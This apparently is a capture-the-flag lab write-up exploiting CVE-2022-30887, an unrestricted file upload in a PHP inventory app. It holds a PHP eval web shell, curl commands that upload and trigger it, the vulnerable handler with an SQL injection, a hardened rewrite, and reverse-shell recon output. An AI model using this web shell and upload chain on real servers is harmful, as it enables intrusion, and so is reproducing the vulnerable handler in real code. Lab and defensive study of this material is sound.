i春秋云镜 (iChunqiu cloud range): CVE-2022-30887

The credentials for the login page (not that logging in is needed):

email:mayuri.infospace@gmail.com
passwd:mayurik

Start Burp Suite (bp); its default proxy listens on TCP 8080:

curl -v -x http://127.0.0.1:8080/  http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/login.php

C:\Users\Administrator>type z:\999.php
<?=eval($_POST[9]);
C:\Users\Administrator>

curl -v -F "productImage=@z:/999.php" -F "btn=1" -x http://127.0.0.1:8080/  http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/php_action/editProductImage.php?id=1

get flag:

curl -v -d "9=system('cat /flag');"  http://eci-2ze2eis9aefyejwfnape.cloudeci1.ichunqiu.com/assets/myimages/999.php

flag{027c354b-32db-449e-a92f-0f9e3472bf8c}

/var/www/html/php_action/editProductImage.php

<?php

require_once 'core.php';

//$valid['success'] = array('success' => false, 'messages' => array());
// Taken straight from the query string and later interpolated, unescaped, into the UPDATE statement.
$productId = $_GET['id'];

if($_POST) {

    // The client-supplied file name is used as-is: no extension, content-type or size check,
    // so any file (including a .php script) is written into a web-served directory.
    $image = $_FILES['productImage']['name'];
    $target = "../assets/myimages/".basename($image);

    if (move_uploaded_file($_FILES['productImage']['tmp_name'], $target)) {
        // @unlink("uploadImage/Profile/".$_POST['old_image']);
        //echo $_FILES['image']['tmp_name'];
        //cho $target;exit;
        $msg = "Image uploaded successfully";
        echo $msg;
    }
    else{
        $msg = "Failed to upload image";
        echo $msg;exit;
    }

    $sql = "UPDATE product SET product_image = '$image' WHERE product_id = $productId";
    //echo $sql;exit;
    if($connect->query($sql) === TRUE) {
        $valid['success'] = true;
        $valid['messages'] = "Successfully Updated";
        header('location:../product.php');
    }
    else {
        $valid['success'] = false;
        $valid['messages'] = "Error while updating product image";
    }
    // /else

    $connect->close();

    echo json_encode($valid);

} // /if $_POST
?>
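A hardened replacement for the handler above, added here as an example and not part of the original project: it validates the product id, checks the upload by its content rather than its name, stores it under a server-chosen name, and uses a prepared statement. The $connect mysqli handle and the ../assets/myimages/ path come from the page; the allowed image types and the random-name scheme are assumptions.

```php
<?php
// Hardened editProductImage.php (added example, not the project's own code).
// Assumes core.php provides a mysqli handle in $connect, as the original file does.
require_once 'core.php';

// Only accept the product id as a positive integer; the original concatenated
// $_GET['id'] straight into the UPDATE statement.
$productId = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($productId === false || $productId === null) {
    http_response_code(400);
    exit('invalid product id');
}

if (!isset($_FILES['productImage']) || $_FILES['productImage']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit('no file uploaded');
}

$tmp = $_FILES['productImage']['tmp_name'];
if (!is_uploaded_file($tmp)) {
    http_response_code(400);
    exit('invalid upload');
}

// Decide the type from the file contents, not from the client-supplied name.
$finfo   = new finfo(FILEINFO_MIME_TYPE);
$allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif']; // assumed whitelist
$mime    = $finfo->file($tmp);
if (!isset($allowed[$mime]) || @getimagesize($tmp) === false) {
    http_response_code(415);
    exit('only JPEG, PNG or GIF images are accepted');
}

// Server-chosen name: neither the extension nor any path fragment comes from the request.
$name   = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
$target = __DIR__ . '/../assets/myimages/' . $name;
if (!move_uploaded_file($tmp, $target)) {
    http_response_code(500);
    exit('failed to store image');
}

// Parameterised update instead of string interpolation.
$stmt = $connect->prepare('UPDATE product SET product_image = ? WHERE product_id = ?');
$stmt->bind_param('si', $name, $productId);
$ok = $stmt->execute();
$stmt->close();
$connect->close();
echo json_encode(['success' => $ok, 'messages' => $ok ? 'Successfully Updated' : 'Error while updating product image']);
```

Pair this with a web-server rule that serves assets/myimages/ as static files only, so that even a file that slips through cannot be executed as PHP.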

Pop a reverse shell:

www-data@engine-2:/tmp$ uname  -a
Linux engine-2 4.19.91-20220519040629.182dd72.al7.x86_64 #1 SMP Thu May 19 04:09:16 UTC 2022 x86_64 GNU/Linux
www-data@engine-2:/tmp$
www-data@engine-2:/tmp$ curl  cip.cc
IP	: 39.106.20.178
地址	: 中国  北京
运营商	: 阿里云/电信/联通/移动/铁通/教育网

数据二	: 北京市 | 阿里云

数据三	: 中国北京北京市 | 阿里云

URL	: http://www.cip.cc/39.106.20.178
www-data@engine-2:/tmp$ 
www-data@engine-2:/tmp$ df -h
Filesystem      Size  Used Avail Use% Mounted on
overlay          30G  9.0G   20G  33% /
tmpfs            64M     0   64M   0% /dev
tmpfs           336M     0  336M   0% /sys/fs/cgroup
/dev/vda         30G   56M   28G   1% /etc/hosts
kataShared       19G   14G  4.0G  78% /etc/resolv.conf
shm              63M     0   63M   0% /dev/shm
www-data@engine-2:/tmp$ free -m
              total        used        free      shared  buff/cache   available
Mem:            670         165         114           0         391         435
Swap:             0           0           0
www-data@engine-2:/tmp$ 
www-data@engine-2:/tmp$ php -v
PHP 7.2.20 (cli) (built: Jul 12 2019 23:33:38) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
www-data@engine-2:/tmp$ 
